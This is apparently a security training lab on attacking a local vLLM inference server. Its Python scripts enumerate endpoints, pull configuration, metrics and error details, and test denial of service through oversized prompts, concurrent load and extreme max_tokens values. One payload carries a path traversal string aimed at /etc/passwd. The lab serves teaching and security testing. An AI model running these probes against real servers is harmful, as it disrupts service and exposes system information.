Lab: Inference Server Exploitation
Attack vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.
Prerequisites
- Docker and Docker Compose installed
- Understanding of REST APIs and gRPC
- Python with `httpx`, `grpcio`, and `python-dotenv`
- Familiarity with model serving architectures

```shell
pip install httpx grpcio grpcio-tools aiohttp python-dotenv
```

Background
Inference servers like vLLM, HuggingFace TGI, and NVIDIA Triton are the backbone of production LLM deployments. Their attack surface extends beyond the model itself to include management APIs, health endpoints, metrics dashboards, and configuration interfaces that may expose sensitive information or enable denial of service.
Lab Exercises
Deploy a Vulnerable Inference Server
Set up a local vLLM instance with default configuration to serve as the attack target.
```yaml
version: "3.8"
services:
  vllm:
    image: vllm/vllm-openai:latest
    ports:
      - "8000:8000"
    command: >
      --model TinyLlama/TinyLlama-1.1B-Chat-v1.0
      --max-model-len 2048
      --dtype float16
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: 1
              capabilities: [gpu]
    environment:
      - VLLM_LOGGING_LEVEL=DEBUG
```

```shell
docker compose up -d
# Wait for model to load
sleep 30
curl http://localhost:8000/health
```

Enumerate Exposed Endpoints
Discover and catalog all endpoints exposed by the inference server.
```python
#!/usr/bin/env python3
"""Enumerate inference server endpoints for information disclosure."""
import httpx

BASE_URL = "http://localhost:8000"

# Common inference server endpoints across vLLM, TGI, and Triton
ENDPOINTS = [
    # vLLM endpoints
    "/health", "/v1/models", "/v1/completions", "/v1/chat/completions",
    "/metrics", "/version", "/tokenize", "/detokenize",
    # Common debug/management endpoints
    "/debug", "/config", "/status", "/info",
    "/v2/health/ready", "/v2/health/live", "/v2/models",
    "/v2/repository/index",
    # Metrics and monitoring
    "/metrics/prometheus", "/stats", "/dashboard",
    # Documentation
    "/docs", "/redoc", "/openapi.json",
]

def enumerate_endpoints():
    results = {"accessible": [], "forbidden": [], "not_found": []}
    for endpoint in ENDPOINTS:
        try:
            resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5)
            if resp.status_code == 200:
                results["accessible"].append({
                    "path": endpoint,
                    "content_type": resp.headers.get("content-type", "unknown"),
                    "body_preview": resp.text[:200],
                })
            elif resp.status_code == 403:
                results["forbidden"].append(endpoint)
            else:
                results["not_found"].append(endpoint)
        except httpx.RequestError:
            results["not_found"].append(endpoint)

    print("=== Accessible Endpoints ===")
    for ep in results["accessible"]:
        print(f"  {ep['path']} [{ep['content_type']}]")
        print(f"    {ep['body_preview'][:100]}...")
    print(f"\n=== Forbidden: {len(results['forbidden'])} ===")
    print(f"=== Not Found: {len(results['not_found'])} ===")
    return results

if __name__ == "__main__":
    enumerate_endpoints()
```

```shell
python endpoint_enum.py
```

Extract Model and System Information
Use discovered endpoints to extract sensitive configuration details.
```python
#!/usr/bin/env python3
"""Extract model and system information from inference server."""
import httpx
import json

BASE_URL = "http://localhost:8000"

def extract_model_info():
    """Extract model configuration and metadata."""
    print("=== Model Information ===")
    # Model list reveals model names, sizes, and configuration
    resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5)
    if resp.status_code == 200:
        models = resp.json()
        print(f"Models: {json.dumps(models, indent=2)}")

    # OpenAPI schema reveals all available parameters
    resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5)
    if resp.status_code == 200:
        schema = resp.json()
        paths = list(schema.get("paths", {}).keys())
        print(f"\nAPI paths: {paths}")

def extract_metrics():
    """Extract Prometheus metrics for infrastructure intelligence."""
    print("\n=== Prometheus Metrics ===")
    resp = httpx.get(f"{BASE_URL}/metrics", timeout=5)
    if resp.status_code == 200:
        lines = resp.text.split("\n")
        interesting = [l for l in lines if any(
            k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"]
        ) and not l.startswith("#")]
        for line in interesting[:20]:
            print(f"  {line}")

def extract_error_info():
    """Trigger errors to extract stack traces and internal info."""
    print("\n=== Error Information Extraction ===")
    # Send malformed requests to trigger verbose errors
    payloads = [
        {"model": "nonexistent-model",
         "messages": [{"role": "user", "content": "test"}]},
        {"model": "../../../etc/passwd", "prompt": "test"},
        {"messages": [{"role": "system", "content": "A" * 100000}]},
    ]
    for payload in payloads:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json=payload,
                timeout=10,
            )
            if resp.status_code != 200:
                error_body = resp.text[:500]
                print(f"  Status {resp.status_code}: {error_body}")
        except Exception as e:
            print(f"  Exception: {e}")

if __name__ == "__main__":
    extract_model_info()
    extract_metrics()
    extract_error_info()
```

```shell
python info_extraction.py
```

Document all information disclosed through each endpoint.
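The raw `/metrics` output is easier to mine once parsed into name/value pairs. Below is a minimal sketch of a Prometheus text-format parser for simple gauge and counter lines; the sample metric names (`vllm:gpu_cache_usage_perc`, `vllm:num_requests_waiting`) are illustrative and may differ across vLLM versions:

```python
"""Parse Prometheus text-format metrics into name/value pairs (sketch)."""

def parse_metrics(text: str) -> dict:
    """Return {base_metric_name: [values]} for simple metric lines,
    skipping HELP/TYPE comments. Label sets are stripped so related
    series group under one base name. Does not handle escaped spaces
    inside label values."""
    metrics = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip comments and blanks
        # Lines look like: name{labels} value   or   name value
        parts = line.rsplit(" ", 1)
        if len(parts) != 2:
            continue
        name, value = parts
        base = name.split("{", 1)[0]
        try:
            metrics.setdefault(base, []).append(float(value))
        except ValueError:
            continue  # non-numeric value, e.g. NaN formatting oddities
    return metrics

if __name__ == "__main__":
    # Illustrative sample resembling vLLM-style metrics output
    sample = "\n".join([
        "# HELP vllm:gpu_cache_usage_perc GPU KV-cache usage.",
        "# TYPE vllm:gpu_cache_usage_perc gauge",
        'vllm:gpu_cache_usage_perc{model="tinyllama"} 0.42',
        'vllm:num_requests_waiting{model="tinyllama"} 3',
    ])
    print(parse_metrics(sample))
```

Feeding the output of `extract_metrics()` through a parser like this makes it straightforward to diff metric values before and after an attack run.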
Test Denial-of-Service Vectors
Identify resource exhaustion and DoS vectors specific to inference servers.
```python
#!/usr/bin/env python3
"""Test denial-of-service vectors against inference server.

WARNING: Run only against local test instances. Never against production."""
import httpx
import time
from concurrent.futures import ThreadPoolExecutor

BASE_URL = "http://localhost:8000"

def test_context_overflow():
    """Test handling of max-context-length inputs."""
    print("=== Context Overflow Test ===")
    long_prompt = "Repeat this. " * 10000  # Exceed context window
    try:
        start = time.time()
        resp = httpx.post(
            f"{BASE_URL}/v1/chat/completions",
            json={
                "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                "messages": [{"role": "user", "content": long_prompt}],
                "max_tokens": 10,
            },
            timeout=30,
        )
        elapsed = time.time() - start
        print(f"  Status: {resp.status_code} ({elapsed:.1f}s)")
        print(f"  Response: {resp.text[:200]}")
    except Exception as e:
        print(f"  Error: {e}")

def test_concurrent_load():
    """Test server behavior under concurrent request load."""
    print("\n=== Concurrent Load Test ===")

    def make_request(i):
        try:
            start = time.time()
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": f"Count to {i}"}],
                    "max_tokens": 100,
                },
                timeout=60,
            )
            elapsed = time.time() - start
            return {"id": i, "status": resp.status_code, "latency": elapsed}
        except Exception as e:
            return {"id": i, "status": "error", "error": str(e)}

    # Gradually increase concurrency
    for concurrent in [5, 10, 20]:
        with ThreadPoolExecutor(max_workers=concurrent) as executor:
            start = time.time()
            futures = [executor.submit(make_request, i) for i in range(concurrent)]
            results = [f.result() for f in futures]
            total = time.time() - start
        errors = sum(1 for r in results if r["status"] != 200)
        avg_latency = sum(
            r.get("latency", 0) for r in results if r["status"] == 200
        ) / max(1, concurrent - errors)
        print(f"  Concurrent={concurrent}: errors={errors}, "
              f"avg_latency={avg_latency:.1f}s, total={total:.1f}s")

def test_max_tokens_abuse():
    """Test behavior with extreme max_tokens values."""
    print("\n=== Max Tokens Abuse ===")
    for max_tokens in [1, 100, 10000, 100000, -1, 0]:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": "Hi"}],
                    "max_tokens": max_tokens,
                },
                timeout=30,
            )
            print(f"  max_tokens={max_tokens}: status={resp.status_code}")
        except Exception as e:
            print(f"  max_tokens={max_tokens}: error={e}")

if __name__ == "__main__":
    test_context_overflow()
    test_concurrent_load()
    test_max_tokens_abuse()
```

```shell
python dos_vectors.py
```
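Average latency alone can hide degradation, since a few very slow requests dominate the tail. A small helper that summarizes the latency samples collected by the load test may make the DoS evidence clearer (a sketch; the choice of p95 and nearest-rank percentile math is arbitrary, not part of the lab's scripts):

```python
"""Summarize latency samples from load tests (sketch)."""
import statistics

def latency_summary(latencies: list[float]) -> dict:
    """Compute mean/median/p95/max for request latencies in seconds,
    using the nearest-rank method for the percentile."""
    if not latencies:
        return {}
    ordered = sorted(latencies)
    # Nearest-rank p95: index ceil(0.95 * n) - 1
    p95_idx = max(0, -(-len(ordered) * 95 // 100) - 1)
    return {
        "mean": statistics.fmean(ordered),
        "median": statistics.median(ordered),
        "p95": ordered[p95_idx],
        "max": ordered[-1],
    }

if __name__ == "__main__":
    # One slow outlier skews the mean well above the median
    print(latency_summary([0.2, 0.3, 0.4, 0.5, 5.0]))
```

Comparing these summaries across the concurrency levels (5, 10, 20) gives a more defensible picture of when the server starts to degrade than a single average.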
Troubleshooting
| Issue | Solution |
|---|---|
| Docker container fails to start | Verify GPU drivers and NVIDIA container toolkit installation |
| No GPU available | Use CPU-only mode by removing GPU configuration from docker-compose |
| Server returns 503 during tests | The model may still be loading; wait longer after startup |
| Metrics endpoint not found | Different server versions expose metrics at different paths |
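For the 503-during-startup case above, polling readiness with a deadline is more reliable than a fixed `sleep 30`. A minimal sketch follows; `wait_ready` and its defaults are illustrative, and the probe is injectable so the helper can be exercised without a live server:

```python
"""Poll a readiness probe until it succeeds or a deadline passes (sketch)."""
import time

def wait_ready(probe, timeout: float = 120.0, interval: float = 1.0,
               _clock=time.monotonic, _sleep=time.sleep) -> bool:
    """Call probe() until it returns True or timeout seconds elapse.

    probe: zero-arg callable returning bool, e.g. a wrapped GET /health
    that returns resp.status_code == 200."""
    deadline = _clock() + timeout
    while _clock() < deadline:
        try:
            if probe():
                return True
        except Exception:
            pass  # e.g. connection refused while the model is still loading
        _sleep(interval)
    return False

if __name__ == "__main__":
    # Stub probe: fails twice, then succeeds
    attempts = iter([False, False, True])
    print(wait_ready(lambda: next(attempts), timeout=5, interval=0))
```

In the lab, the probe would wrap `httpx.get("http://localhost:8000/health", timeout=5)` and the attack scripts would run only after `wait_ready` returns `True`.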
Related Topics
- Container Breakout - Escaping from containerized inference servers
- Model Serving Attacks - Broader model serving framework attacks
- GPU Side-Channel - Hardware-level information leakage
- Full-Stack Exploit - Chaining infrastructure with model vulnerabilities
References
- "vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM inference server
- "Security Analysis of ML Inference Servers" - Chen et al. (2024) - Security assessment of common inference frameworks
- "Denial of Service Attacks on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
- "MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - Security best practices for inference infrastructure
Why are inference server endpoints a security concern even when the underlying model is well-aligned?